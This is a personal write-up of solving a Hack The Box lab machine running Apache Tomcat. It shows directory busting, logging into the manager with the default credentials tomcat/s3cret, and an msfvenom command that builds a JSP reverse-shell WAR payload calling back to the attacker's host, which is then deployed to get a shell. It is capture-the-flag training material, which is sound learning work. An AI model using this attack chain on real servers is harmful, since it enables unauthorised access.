I was able to solve this box today on my own without relying on a walkthrough, following yesterday’s success with the box named Blue. I feel like the hard work that I have put in over the past couple of months is finally paying off. I am so happy :)
nmap scan
directory busting with gobuster
gobuster dir -u http://10.10.10.95:8080 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
http://10.10.10.95:8080/docs
http://10.10.10.95:8080/example
http://10.10.10.95:8080/manager
After few tries of default credentials, it automatically redirected me to manager/html page and the second line listed the username tomcat and the password s3cret so I tried the credentials, though I was skeptical.
Contrary to my doubts, the username and password I tried hit the mark and directed me to Tomcat Web Application Manager.
After scrolling down a bit, I found a section (WAR file to deploy.) where I could upload a file. As soon as I saw this functionality, I thought of a solution where I could generate a payload, run it on the server, and finally pop the reverse shell to gain access.
Generating payload
Since we need to upload a .war reverse shell, I refered to the Reverse Shell Cheatsheet from the famous PayloadsAllTheThings github.
The full command to generate the shell looks like this:
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.15 LPORT=1234 -f war > reverse.war strings reverse.war
Uploaded the generated payload.
After uploading the payload and clicking the Deploy button, a new path named reverse appeared under the Applications section for the payload I created.
Before navigating to the new path to run the payload, I needed to set up a listener to listen for the port. Then, I successfully gained the shell.
After spending some time exploring the directories, I finally found the flags directory, in which included a text file called 2 for the price of 1.txt and it contained both the user flag and the root flag.
